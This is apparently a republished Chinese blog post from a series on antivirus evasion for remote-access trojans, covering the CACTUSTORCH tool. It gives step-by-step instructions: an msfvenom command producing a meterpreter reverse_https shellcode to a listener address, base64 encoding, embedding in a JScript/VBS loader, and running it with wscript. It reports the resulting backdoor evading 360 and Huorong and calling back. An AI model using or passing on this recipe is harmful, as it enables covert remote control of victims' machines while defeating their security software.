远控免杀专题(24)-CACTUSTORCH免杀
转载:https://mp.weixin.qq.com/s/g0CYvFMsrV7bHIfTnSUJBw
免杀能力一览表
几点说明:
1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),火绒版本5.0.34.16(2020.01.01),360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀或杀软查杀能力的判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软,这样的技术肯定是有的,只是没被公开,一旦公开第二天就能被杀了,其实我们只要能bypass目标主机上的杀软就足够了。
一、CACTUSTORCH介绍
在2017年4月由James Forshaw开源了一个工具DotNetToJScript,能够利用JS或者Vbs等脚本加载.Net程序。在DotNetToJScript发布后,有几款工具根据其原理开发出来,比如CACTUSTORCH、SharpShooter、StarFighters等等。
而CACTUSTORCH和SharpShooter都同一个组织开发,2017年发布,主要使用vbs或js执行C#的二进制payload,提供多种方式绕过杀软,支持js、vbs、vbe、vba、hta等多种格式,还提供了支持Cobalt Strike的cna文件。
二、安装CACTUSTORCH
CACTUSTORCH安装和使用都比较简单。
1、从Github上clone到本地
git clone https://github.com/mdsecactivebreach/CACTUSTORCH
2、ok了,纯绿色版,就这么简单。
三、CACTUSTORCH说明
CACTUSTORCH生成的脚本可以用于执行C#的二进制文件,CACTUSTORCH在免杀方面有以下几个特性:
1、在payload中不使用Kernel32 API声明,避免被杀软检测
2、可以在C#二进制内机械能混淆
3、可任意指定目标二进制程序进行注入
4、允许指定任意shellcode
5、不产生PowerShell.exe
6、不需要Powershell
7、不需要office
8、不调用WScript.Shell
9、不需要分段,因为完整的无阶段shellcode可以包含在传送的payload内
10、没有静态父对子进行生成,用户可以更改wscript.exe生成的内容
四、利用CACTUSTORCH生成后门
以生成js脚本为例进行测试。
1、首先要选择一个待注入的exe文件,默认是rundll32.exe, 你也可以使用notepad.exe, calc.exe等,在CACTUSTORCH.js文件中直接修改就行。
2、使用 Cobalt Strike或Metasploit生成一个32位的shellcode
msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=3333 -f raw -o payload.bin
3、执行下面命令cat payload.bin | base64 -w 0
4、把生成的base64编码后的代码复制到CACTUSTORCH.js文件中的var code =。
如果是vbs文件,则需要修改CACTUSTORCH.vbs文件中Dim code: code =后面的代码。
如果是生成VBA代码,还需要使用splitvba.py来对代码进行分割,详细可查阅官方说明https://github.com/mdsecactivebreach/CACTUSTORCH。
5、在测试机中执行wscript.exe CACTUSTORCH.js
msf中监听windows/meterpreter/reverse_https可正常上线
6、打开杀软进行测试
360和火绒都免杀,都可正常上线
7、测试了一下vbs,也可360和火绒免杀上线
又测试了一下vba,免杀效果也差不多。
五、CACTUSTORCH小结
因为CACTUSTORCH也是基于DotNetToJScript来实现免杀的工具,同类工具里知名度比较高,所以被查杀的有些惨不忍睹,不过能直接过360和火绒也算一个小亮点了。杀软查杀其脚本主要是里面很多代码关键字都被列入了特征字符,感兴趣的可以尝试修改其脚本代码做二次免杀。
六、参考资料
DotNetToJScript 复活之路:https://evi1cg.me/archives/AMSI_bypass.html
使用CACTUSTORCH 生成Payload:http://4hou.win/wordpress/?p=4727
远控免杀专题(24)-CACTUSTORCH免杀相关推荐
- 远控免杀专题(9)-Avet免杀(VT免杀率14/71)
本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2.远控免杀专题(2)-msfvenom隐藏的参数: ...
- 远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(13)-zirikatu免杀(VT免杀率39/71)
声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...
- 远控免杀专题(22)-SpookFlare免杀
转载:https://mp.weixin.qq.com/s/LfuQ2XuD7YHUWJqMRUmNVA 免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了By ...
- 远控免杀专题(19)-nps_payload免杀
免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/meterper ...
- 远控免杀专题(20)-GreatSCT免杀
转载:https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ 免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了By ...
- 远控免杀专题(15)-DKMC免杀
0x01 免杀能力一览表 几点说明: 1.上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/met ...
最新文章
- Yolo:实时目标检测实战(下)
- CVPR 2019 | 基于可解释性以及细粒度的可视化解释卷积神经网络
- jvm(6)-Class字节码文件结构总结
- 前端学习(2183):tabber--基本架构的构建
- SQL数据库语言基础之SqlServer系统函数、聚合集合函数【大总结】
- 【洛谷5284】[十二省联考2019] 字符串问题(后缀树优化建边)
- PHP的php://input和$HTTP_RAW_POST_DATA 和$_POST的关系
- 使用Vue cli 来快速开发并打包封装项目教程
- 莫烦Tensorflow学习笔记(10-12)——构建简单的神经网络及其可视化
- 牛学长iTunes备份密码移除工具
- 值得学习17个C/C++ 超经典开源项目,面试加分
- P3324 [SDOI2015]星际战争二分答案+网络流
- 1360: 最大公约与最小公倍
- 【LeetCode】复数乘法
- 【Git】Git pull 拉代码卡在Unpacking objects
- 随心下载网页中嵌套的视频(各大视频网站并不适用)
- 微信小程序android 校园班车乘车预约系统ssm+uniapp
- car cdr cadr 服务器
- 卫星位置计算的c语言,C语言-详细计算GPS卫星位置.doc
- 计算机专业用小新pro14,联想小新Pro 14 2021使用体验:新晋断货王诞生了